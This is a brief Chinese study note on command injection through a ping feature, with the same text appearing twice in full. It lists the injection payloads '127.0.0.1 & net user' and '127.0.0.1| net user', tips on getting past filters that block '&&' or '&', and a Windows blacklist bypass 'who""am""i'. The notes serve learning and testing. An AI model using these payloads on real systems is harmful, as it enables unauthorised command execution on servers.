命令注入流程:
第一步:确认调用了ping命令
第二步:确认可控字段 127.0.0.1
第三部:确认命令语句:127.0.0.1 & net user
手工实战:&&更容易被过滤 &也是可以的
当&都被过滤的时候:就要考虑管道命令了|
127.0.0.1| net user
黑名单:
who""am""i:windows下绕过黑名单
命令注入通常有回显
命令注入流程:
第一步:确认调用了ping命令
第二步:确认可控字段 127.0.0.1
第三部:确认命令语句:127.0.0.1 & net user
手工实战:&&更容易被过滤 &也是可以的
当&都被过滤的时候:就要考虑管道命令了|
127.0.0.1| net user
黑名单:
who""am""i:windows下绕过黑名单
命令注入通常有回显